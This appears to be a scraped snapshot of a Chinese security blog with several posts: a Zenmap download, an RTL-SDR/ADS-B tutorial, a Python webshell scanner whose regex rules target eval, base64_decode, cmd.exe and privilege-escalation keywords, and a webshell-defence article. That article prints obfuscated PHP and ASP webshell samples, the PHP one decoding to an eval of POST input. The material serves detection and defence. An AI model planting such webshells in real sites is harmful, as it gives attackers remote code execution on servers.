dadan.org
域名年龄: 11年11个月5天HTTP/1.1 200 OK 服务器:nginx 访问时间:2015年09月06日 18:54:56 类型:text/html; charset=UTF-8 Transfer-Encoding: chunked 连接:keep-alive 动作:Accept-Encoding 语言环境:PHP/5.5.25 X-Pingback: http://www.dadan.org/xmlrpc.php Content-Encoding: gzip 网站编码:UTF-8
大胆's BLOG大胆博客点滴记录,持之以恒首页个人原创代码审计杂七杂八网络安全资源分享nmap的gui版本Zenmap 5.50版本下载备份2013年10月31日大胆没有评论工作中试遍了nmap5.50以上的版本,扫描中总会报C++错误结束进程,都不能用,用来用去就是nmap5.50 版本最稳定。存一份Zenmap 5.50下载备用,与诸苦逼安全君共勉。http://www.400gb.com/file/33519602分类: 资源分享标签: Nmap, ZenmapRTL2832U+R820T电视棒windows下安装sdr# 以及搭建ADS-B使用VirtualRadar看飞机的教程2013年7月20日大胆2 条评论本文中提到的软件我会打包给出下载地址 http://www.400gb.com/file/75231710(包涵文中所有工具、驱动最新版及所需的.net3.5sp1环境)。这篇文章是我根据网上的教程和自己的经验修改的详细版本,为了方便入门新手。先来说说RTL2832U+R820T在windows下安装sdr#的方法。首先科普下sdr#。sdr#简单通俗来说就是一款可以支持RTL2832U+R820T接受调频广播的工具,可以让RTL2832U+R820T电视棒当成调频收音机来使用。类似的工具还有很多例如hdsdr等等。1:首先插入电视棒安装驱动,注意这个驱动不是光盘里的,而是 Zadig 驱动。win7系统不要选择自动安装。要手动安装。驱动的下载地址是http://sourceforge.net/projects/libwdi/files/zadig/ 注意XP是单独的驱动,win7下载普通版本的即可。2:运行zading,单击 options,选择 list all devices ,在下拉列表里选择你的电视棒,绿色箭头右边默认 winusb即可 ,然后单击 instatll driver 即可。(这里要注意检查驱动是否安装成功)阅读全文…分类: 个人原创, 杂七杂八, 资源分享标签: ADS-B, RTL2832U+R820T, sdr, VirtualRadar, 电视棒python版webshell查杀2013年7月16日大胆没有评论#!/usr/bin/python# -*- coding: utf-8 -*-#By:Seay#blog:www.cnseay.comimport osimport sysimport rerulelist = ['(\$_(GET|POST|REQUEST)\[.{0,15}\]\(\$_(GET|POST|REQUEST)\[.{0,15}\]\))','(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))','eval\(base64_decode\(','(eval\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))','(assert\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))','(\$[\w_]{0,15}\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))','(wscript\.shell)','(gethostbyname\()','(cmd\.exe)','(shell\.application)','(documents\s+and\s+settings)','(system32)','(serv-u)','(提权)','(phpspy)','(后门)','(webshell)','(Program\s+Files)']def Scan(path):for root,dirs,files in os.walk(path):for filespath in files:isover = Falseif '.' in filespath:ext = filespath[(filespath.rindex('.')+1):]if ext=='php':file= open(os.path.join(root,filespath))filestr = file.read()file.close()for rule in rulelist:result = re.compile(rule).findall(filestr)if result:print '文件:'+os.path.join(root,filespath)print '恶意代码:'+str(result[0])print '\n\n'breakif os.path.lexists(sys.argv[1]):print('\n\n开始扫描:'+sys.argv[1])print(' 可疑文件 ')print('########################################')Scan(sys.argv[1])print('提示:扫描完成-- O(∩_∩)O哈哈~')else:print '提示:指定的扫描目录不存在--- 我靠( \'o′)!!凸'分类: 资源分享标签: python, webshell查杀企业web安全之webshell防控浅谈2013年7月15日大胆没有评论 根据我片面的工作经验分析,目前企业遇到的入侵还是以web为入口的居多。其中webshell依然是常见的提权及渗透通道。 下面我仅用自己的一点片面经验谈谈如何针对webshell做出安全防控工作。 通常情况下,我们会依靠各种脚本和工具来查杀webshell,但是随着webshell的变异加密等多样化的变形方式的公布,传统的关键字对比查杀模式就出来了,大量误报以及漏报的问题。 例如如下现在流行的几款变异小马:exp1:<script language=php>$_1=chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);@$_1(chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59));</script>exp2:<%On Error Resume NextSet f = Server.CreateObject("ADODB.Stream")f.Type = 2f.mode = 3f.Charset = "gb2312"f.openf.WriteText "<"&Chr("37")&StrReverse(Request("cq3h63"))&Chr("37")&"
© 2010 - 2020 网站综合信息查询 同IP网站查询 相关类似网站查询 网站备案查询网站地图 最新查询 最近更新 优秀网站 热门网站 全部网站 同IP查询 备案查询
2024-04-27 08:19, Process in 0.0181 second.